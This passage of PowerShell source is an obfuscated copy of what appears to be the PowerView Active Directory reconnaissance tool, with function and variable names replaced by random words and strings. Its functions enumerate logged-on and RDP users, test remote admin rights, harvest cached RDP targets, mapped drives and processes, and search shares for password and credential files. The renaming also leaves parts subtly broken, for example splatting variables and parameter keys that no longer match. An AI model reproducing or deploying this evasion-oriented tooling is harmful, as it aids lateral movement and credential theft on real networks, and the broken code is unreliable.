$fRWHEzms99 = $Info | Select-Object * | |
$fRWHEzms99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$fRWHEzms99.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo') | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$fRWHEzms99 | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
} | |
else { | |
Write-Verbose "[Ukrainians] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function cheapness { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.RegLoggedOnUser')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost' | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
try { | |
$Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$MqGzGCsi99") | |
$Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { | |
$bnjyYveg99 = Malory -ObjectSID $_ -sVUXjDxI99 'DomainSimple' | |
if ($bnjyYveg99) { | |
$bnjyYveg99, $VeuSFWRJ99 = $bnjyYveg99.Split('@') | |
} | |
else { | |
$bnjyYveg99 = $_ | |
$VeuSFWRJ99 = $Null | |
} | |
$aAuLCUKg99 = New-Object PSObject | |
$aAuLCUKg99 | Add-Member Noteproperty 'ComputerName' "$MqGzGCsi99" | |
$aAuLCUKg99 | Add-Member Noteproperty 'UserDomain' $VeuSFWRJ99 | |
$aAuLCUKg99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$aAuLCUKg99 | Add-Member Noteproperty 'UserSID' $_ | |
$aAuLCUKg99.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser') | |
$aAuLCUKg99 | |
} | |
} | |
catch { | |
Write-Verbose "[cheapness] Error opening remote registry on '$MqGzGCsi99' : $_" | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function prodigies { | |
[OutputType('PowerView.RDPSessionInfo')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$CQkTRiRE99 = $hlCMaIqa99::WTSOpenServerEx($GrySniik99) | |
if ($CQkTRiRE99 -ne 0) { | |
$nDOeyBjq99 = [IntPtr]::Zero | |
$KNwQMaKv99 = 0 | |
$jdzRPRXs99 = $hlCMaIqa99::WTSEnumerateSessionsEx($CQkTRiRE99, [ref]1, 0, [ref]$nDOeyBjq99, [ref]$KNwQMaKv99);$boIzopBu99 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() | |
$iSpjhTbK99 = $nDOeyBjq99.ToInt64() | |
if (($jdzRPRXs99 -ne 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $kDmEsHoN99::GetSize() | |
for ($i = 0; ($i -lt $KNwQMaKv99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $kDmEsHoN99 | |
$uQKQlqVS99 = New-Object PSObject | |
if ($Info.pHostName) { | |
$uQKQlqVS99 | Add-Member Noteproperty 'ComputerName' $Info.pHostName | |
} | |
else { | |
$uQKQlqVS99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
} | |
$uQKQlqVS99 | Add-Member Noteproperty 'SessionName' $Info.pSessionName | |
if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { | |
$uQKQlqVS99 | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" | |
} | |
else { | |
$uQKQlqVS99 | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" | |
} | |
$uQKQlqVS99 | Add-Member Noteproperty 'ID' $Info.SessionID | |
$uQKQlqVS99 | Add-Member Noteproperty 'State' $Info.State | |
$KlWXiqyN99 = [IntPtr]::Zero | |
$LzcDbrAL99 = 0 | |
$mosihINr99 = $hlCMaIqa99::WTSQuerySessionInformation($CQkTRiRE99, $Info.SessionID, 14, [ref]$KlWXiqyN99, [ref]$LzcDbrAL99);$lwlhKaVu99 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() | |
if ($mosihINr99 -eq 0) { | |
Write-Verbose "[prodigies] Error: $(([ComponentModel.Win32Exception] $lwlhKaVu99).Message)" | |
} | |
else { | |
$vBWbMiqa99 = $KlWXiqyN99.ToInt64() | |
$wOiJpNvB99 = New-Object System.Intptr -ArgumentList $vBWbMiqa99 | |
$Info2 = $wOiJpNvB99 -as $WUTfdRiT99 | |
$dVaQVEpK99 = $Info2.Address | |
if ($dVaQVEpK99[2] -ne 0) { | |
$dVaQVEpK99 = [String]$dVaQVEpK99[2]+'.'+[String]$dVaQVEpK99[3]+'.'+[String]$dVaQVEpK99[4]+'.'+[String]$dVaQVEpK99[5] | |
} | |
else { | |
$dVaQVEpK99 = $Null | |
} | |
$uQKQlqVS99 | Add-Member Noteproperty 'SourceIP' $dVaQVEpK99 | |
$uQKQlqVS99.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo') | |
$uQKQlqVS99 | |
$Null = $hlCMaIqa99::WTSFreeMemory($KlWXiqyN99) | |
$iSpjhTbK99 += $KDfRICkF99 | |
} | |
} | |
$Null = $hlCMaIqa99::WTSFreeMemoryEx(2, $nDOeyBjq99, $KNwQMaKv99) | |
} | |
else { | |
Write-Verbose "[prodigies] Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
$Null = $hlCMaIqa99::WTSCloseServer($CQkTRiRE99) | |
} | |
else { | |
Write-Verbose "[prodigies] Error opening the Remote Desktop Session Host (RD Session Host) server for: $MqGzGCsi99" | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function curses { | |
[OutputType('PowerView.AdminAccess')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$CQkTRiRE99 = $OTnzYMIG99::OpenSCManagerW("\\$GrySniik99", 'ServicesActive', 0xF003F);$boIzopBu99 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() | |
$kkfPhpvP99 = New-Object PSObject | |
$kkfPhpvP99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
if ($CQkTRiRE99 -ne 0) { | |
$Null = $OTnzYMIG99::CloseServiceHandle($CQkTRiRE99) | |
$kkfPhpvP99 | Add-Member Noteproperty 'IsAdmin' $True | |
} | |
else { | |
Write-Verbose "[curses] Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
$kkfPhpvP99 | Add-Member Noteproperty 'IsAdmin' $False | |
} | |
$kkfPhpvP99.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess') | |
$kkfPhpvP99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function passionless { | |
[OutputType('PowerView.ComputerSite')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
if ($GrySniik99 -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { | |
$mQOgITzB99 = $GrySniik99 | |
$GrySniik99 = [System.Net.Dns]::GetHostByAddress($GrySniik99) | Select-Object -ExpandProperty HostName | |
} | |
else { | |
$mQOgITzB99 = @(huckstering -MqGzGCsi99 $GrySniik99)[0].IPAddress | |
} | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$jdzRPRXs99 = $jXhUbjcF99::DsGetSiteName($GrySniik99, [ref]$wOXUIqWw99) | |
$HNDQqiGm99 = New-Object PSObject | |
$HNDQqiGm99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$HNDQqiGm99 | Add-Member Noteproperty 'IPAddress' $mQOgITzB99 | |
if ($jdzRPRXs99 -eq 0) { | |
$ZbNKanPP99 = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($wOXUIqWw99) | |
$HNDQqiGm99 | Add-Member Noteproperty 'SiteName' $ZbNKanPP99 | |
} | |
else { | |
Write-Verbose "[passionless] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
$HNDQqiGm99 | Add-Member Noteproperty 'SiteName' '' | |
} | |
$HNDQqiGm99.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite') | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
$HNDQqiGm99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function convicts { | |
[OutputType('PowerView.ProxySettings')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = $Env:COMPUTERNAME, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
try { | |
$eTwHJTIg99 = @{ | |
'List' = $True | |
'Class' = 'StdRegProv' | |
'Namespace' = 'root\default' | |
'Computername' = $GrySniik99 | |
'ErrorAction' = 'Stop' | |
} | |
if ($PSBoundParameters['Credential']) { $eTwHJTIg99['Credential'] = $KWcDeQDF99 } | |
$xhzbJXcK99 = Get-WmiObject @WmiArguments | |
$Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' | |
$HKCU = 2147483649 | |
$TjPtAyNQ99 = $xhzbJXcK99.GetStringValue($HKCU, $Key, 'ProxyServer').sValue | |
$SmsgRYMQ99 = $xhzbJXcK99.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue | |
$Wpad = '' | |
if ($SmsgRYMQ99 -and ($SmsgRYMQ99 -ne '')) { | |
try { | |
$Wpad = (New-Object Net.WebClient).DownloadString($SmsgRYMQ99) | |
} | |
catch { | |
Write-Warning "[convicts] Error connecting to AutoConfigURL : $SmsgRYMQ99" | |
} | |
} | |
if ($TjPtAyNQ99 -or $SmsgRYMQ99) { | |
$Out = New-Object PSObject | |
$Out | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$Out | Add-Member Noteproperty 'ProxyServer' $TjPtAyNQ99 | |
$Out | Add-Member Noteproperty 'AutoConfigURL' $SmsgRYMQ99 | |
$Out | Add-Member Noteproperty 'Wpad' $Wpad | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings') | |
$Out | |
} | |
else { | |
Write-Warning "[convicts] No proxy settings found for $MqGzGCsi99" | |
} | |
} | |
catch { | |
Write-Warning "[convicts] Error enumerating proxy settings for $MqGzGCsi99 : $_" | |
} | |
} | |
} | |
} | |
function Tientsin { | |
[OutputType('PowerView.LastLoggedOnUser')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$HKLM = 2147483650 | |
$eTwHJTIg99 = @{ | |
'List' = $True | |
'Class' = 'StdRegProv' | |
'Namespace' = 'root\default' | |
'Computername' = $GrySniik99 | |
'ErrorAction' = 'SilentlyContinue' | |
} | |
if ($PSBoundParameters['Credential']) { $eTwHJTIg99['Credential'] = $KWcDeQDF99 } | |
try { | |
$Reg = Get-WmiObject @WmiArguments | |
$Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI' | |
$Value = 'LastLoggedOnUser' | |
$QnBwXijS99 = $Reg.GetStringValue($HKLM, $Key, $Value).sValue | |
$XlLOMWba99 = New-Object PSObject | |
$XlLOMWba99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$XlLOMWba99 | Add-Member Noteproperty 'LastLoggedOn' $QnBwXijS99 | |
$XlLOMWba99.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser') | |
$XlLOMWba99 | |
} | |
catch { | |
Write-Warning "[Tientsin] Error opening remote registry on $GrySniik99. Remote registry likely not enabled." | |
} | |
} | |
} | |
} | |
function bloodshed { | |
[OutputType('PowerView.CachedRDPConnection')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$HKU = 2147483651 | |
$eTwHJTIg99 = @{ | |
'List' = $True | |
'Class' = 'StdRegProv' | |
'Namespace' = 'root\default' | |
'Computername' = $GrySniik99 | |
'ErrorAction' = 'Stop' | |
} | |
if ($PSBoundParameters['Credential']) { $eTwHJTIg99['Credential'] = $KWcDeQDF99 } | |
try { | |
$Reg = Get-WmiObject @WmiArguments | |
$aGUNVpdY99 = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | |
ForEach ($AojeaIVd99 in $aGUNVpdY99) { | |
try { | |
if ($PSBoundParameters['Credential']) { | |
$bnjyYveg99 = Malory -DHIjlbmp99 $AojeaIVd99 -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$bnjyYveg99 = Malory -DHIjlbmp99 $AojeaIVd99 | |
} | |
$jVVArDRL99 = $Reg.EnumValues($HKU,"$AojeaIVd99\Software\Microsoft\Terminal Server Client\Default").sNames | |
ForEach ($FIwWhwru99 in $jVVArDRL99) { | |
if ($FIwWhwru99 -match 'MRU.*') { | |
$GAFChYLF99 = $Reg.GetStringValue($HKU, "$AojeaIVd99\Software\Microsoft\Terminal Server Client\Default", $FIwWhwru99).sValue | |
$SsGeVqhM99 = New-Object PSObject | |
$SsGeVqhM99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UserSID' $AojeaIVd99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'TargetServer' $GAFChYLF99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UsernameHint' $Null | |
$SsGeVqhM99.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') | |
$SsGeVqhM99 | |
} | |
} | |
$IzOZGjxq99 = $Reg.EnumKey($HKU,"$AojeaIVd99\Software\Microsoft\Terminal Server Client\Servers").sNames | |
ForEach ($CbStbNZR99 in $IzOZGjxq99) { | |
$IFbSbZgK99 = $Reg.GetStringValue($HKU, "$AojeaIVd99\Software\Microsoft\Terminal Server Client\Servers\$CbStbNZR99", 'UsernameHint').sValue | |
$SsGeVqhM99 = New-Object PSObject | |
$SsGeVqhM99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UserSID' $AojeaIVd99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'TargetServer' $CbStbNZR99 | |
$SsGeVqhM99 | Add-Member Noteproperty 'UsernameHint' $IFbSbZgK99 | |
$SsGeVqhM99.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') | |
$SsGeVqhM99 | |
} | |
} | |
catch { | |
Write-Verbose "[bloodshed] Error: $_" | |
} | |
} | |
} | |
catch { | |
Write-Warning "[bloodshed] Error accessing $GrySniik99, likely insufficient permissions or firewall rules on host: $_" | |
} | |
} | |
} | |
} | |
function authoritarian { | |
[OutputType('PowerView.RegMountedDrive')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$HKU = 2147483651 | |
$eTwHJTIg99 = @{ | |
'List' = $True | |
'Class' = 'StdRegProv' | |
'Namespace' = 'root\default' | |
'Computername' = $GrySniik99 | |
'ErrorAction' = 'Stop' | |
} | |
if ($PSBoundParameters['Credential']) { $eTwHJTIg99['Credential'] = $KWcDeQDF99 } | |
try { | |
$Reg = Get-WmiObject @WmiArguments | |
$aGUNVpdY99 = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | |
ForEach ($AojeaIVd99 in $aGUNVpdY99) { | |
try { | |
if ($PSBoundParameters['Credential']) { | |
$bnjyYveg99 = Malory -DHIjlbmp99 $AojeaIVd99 -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$bnjyYveg99 = Malory -DHIjlbmp99 $AojeaIVd99 | |
} | |
$yOzesYME99 = ($Reg.EnumKey($HKU, "$AojeaIVd99\Network")).sNames | |
ForEach ($SbJKXvpv99 in $yOzesYME99) { | |
$gQUFvsTf99 = $Reg.GetStringValue($HKU, "$AojeaIVd99\Network\$SbJKXvpv99", 'ProviderName').sValue | |
$CcLdjhLy99 = $Reg.GetStringValue($HKU, "$AojeaIVd99\Network\$SbJKXvpv99", 'RemotePath').sValue | |
$nUUsBHNc99 = $Reg.GetStringValue($HKU, "$AojeaIVd99\Network\$SbJKXvpv99", 'UserName').sValue | |
if (-not $bnjyYveg99) { $bnjyYveg99 = '' } | |
if ($CcLdjhLy99 -and ($CcLdjhLy99 -ne '')) { | |
$nDOmswuA99 = New-Object PSObject | |
$nDOmswuA99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$nDOmswuA99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$nDOmswuA99 | Add-Member Noteproperty 'UserSID' $AojeaIVd99 | |
$nDOmswuA99 | Add-Member Noteproperty 'DriveLetter' $SbJKXvpv99 | |
$nDOmswuA99 | Add-Member Noteproperty 'ProviderName' $gQUFvsTf99 | |
$nDOmswuA99 | Add-Member Noteproperty 'RemotePath' $CcLdjhLy99 | |
$nDOmswuA99 | Add-Member Noteproperty 'DriveUserName' $nUUsBHNc99 | |
$nDOmswuA99.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive') | |
$nDOmswuA99 | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[authoritarian] Error: $_" | |
} | |
} | |
} | |
catch { | |
Write-Warning "[authoritarian] Error accessing $GrySniik99, likely insufficient permissions or firewall rules on host: $_" | |
} | |
} | |
} | |
} | |
function Hamburgs { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.UserProcess')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
try { | |
$eTwHJTIg99 = @{ | |
'ComputerName' = $MqGzGCsi99 | |
'Class' = 'Win32_process' | |
} | |
if ($PSBoundParameters['Credential']) { $eTwHJTIg99['Credential'] = $KWcDeQDF99 } | |
Get-WMIobject @WmiArguments | ForEach-Object { | |
$Owner = $_.getowner(); | |
$fQqvoRcu99 = New-Object PSObject | |
$fQqvoRcu99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$fQqvoRcu99 | Add-Member Noteproperty 'ProcessName' $_.ProcessName | |
$fQqvoRcu99 | Add-Member Noteproperty 'ProcessID' $_.ProcessID | |
$fQqvoRcu99 | Add-Member Noteproperty 'Domain' $Owner.Domain | |
$fQqvoRcu99 | Add-Member Noteproperty 'User' $Owner.User | |
$fQqvoRcu99.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess') | |
$fQqvoRcu99 | |
} | |
} | |
catch { | |
Write-Verbose "[Hamburgs] Error enumerating remote processes on '$GrySniik99', access likely denied: $_" | |
} | |
} | |
} | |
} | |
function extremes { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.FoundFile')] | |
[CmdletBinding(DefaultParameterSetName = 'FileSpecification')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$Path = '.\', | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('SearchTerms', 'Terms')] | |
[String[]] | |
$ahDHFGaL99 = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$UKoebrqd99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$YosUbzPQ99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$PxNkSvQV99, | |
[Parameter(ParameterSetName = 'OfficeDocs')] | |
[Switch] | |
$JtrfgRAO99, | |
[Parameter(ParameterSetName = 'FreshEXEs')] | |
[Switch] | |
$XXaaALNN99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[Switch] | |
$BtynhaDg99, | |
[Parameter(ParameterSetName = 'FileSpecification')] | |
[Switch] | |
$qWyEjPAZ99, | |
[Switch] | |
$iHrKHCFv99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Recurse' = $True | |
'ErrorAction' = 'SilentlyContinue' | |
'Include' = $ahDHFGaL99 | |
} | |
if ($PSBoundParameters['OfficeDocs']) { | |
$ufgcNRNN99['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx') | |
} | |
elseif ($PSBoundParameters['FreshEXEs']) { | |
$UKoebrqd99 = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy') | |
$ufgcNRNN99['Include'] = @('*.exe') | |
} | |
$ufgcNRNN99['Force'] = -not $PSBoundParameters['ExcludeHidden'] | |
$IrlHyazy99 = @{} | |
function testifying { | |
[CmdletBinding()]Param([String]$Path) | |
try { | |
$SWfFOQpc99 = [IO.File]::OpenWrite($Path) | |
$SWfFOQpc99.Close() | |
$True | |
} | |
catch { | |
$False | |
} | |
} | |
} | |
PROCESS { | |
ForEach ($RtHoTVXK99 in $Path) { | |
if (($RtHoTVXK99 -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { | |
$tcwSUBNN99 = (New-Object System.Uri($RtHoTVXK99)).Host | |
if (-not $IrlHyazy99[$tcwSUBNN99]) { | |
Andes -MqGzGCsi99 $tcwSUBNN99 -KWcDeQDF99 $KWcDeQDF99 | |
$IrlHyazy99[$tcwSUBNN99] = $True | |
} | |
} | |
$ufgcNRNN99['Path'] = $RtHoTVXK99 | |
Get-ChildItem @SearcherArguments | ForEach-Object { | |
$sZmszjpm99 = $True | |
if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) { | |
Write-Verbose "Excluding: $($_.FullName)" | |
$sZmszjpm99 = $False | |
} | |
if ($UKoebrqd99 -and ($_.LastAccessTime -lt $UKoebrqd99)) { | |
$sZmszjpm99 = $False | |
} | |
if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $YosUbzPQ99)) { | |
$sZmszjpm99 = $False | |
} | |
if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $PxNkSvQV99)) { | |
$sZmszjpm99 = $False | |
} | |
if ($PSBoundParameters['CheckWriteAccess'] -and (-not (testifying -Path $_.FullName))) { | |
$sZmszjpm99 = $False | |
} | |
if ($sZmszjpm99) { | |
$mnhsRsCN99 = @{ | |
'Path' = $_.FullName | |
'Owner' = $((Get-Acl $_.FullName).Owner) | |
'LastAccessTime' = $_.LastAccessTime | |
'LastWriteTime' = $_.LastWriteTime | |
'CreationTime' = $_.CreationTime | |
'Length' = $_.Length | |
} | |
$tTmDkDIz99 = New-Object -TypeName PSObject -Property $mnhsRsCN99 | |
$tTmDkDIz99.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile') | |
$tTmDkDIz99 | |
} | |
} | |
} | |
} | |
END { | |
$IrlHyazy99.Keys | bauxite | |
} | |
} | |
function lowness { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[String[]] | |
$MqGzGCsi99, | |
[Parameter(Position = 1, Mandatory = $True)] | |
[System.Management.Automation.ScriptBlock] | |
$xWxMuRFl99, | |
[Parameter(Position = 2)] | |
[Hashtable] | |
$yvvaxqfq99, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20, | |
[Switch] | |
$dmwLgLEe99 | |
) | |
BEGIN { | |
$lgcEyInd99 = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() | |
$lgcEyInd99.ApartmentState = [System.Threading.ApartmentState]::STA | |
if (-not $dmwLgLEe99) { | |
$IbxYqHiY99 = Get-Variable -Scope 2 | |
$wsaPAeTQ99 = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true') | |
ForEach ($Var in $IbxYqHiY99) { | |
if ($wsaPAeTQ99 -NotContains $Var.Name) { | |
$lgcEyInd99.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) | |
} | |
} | |
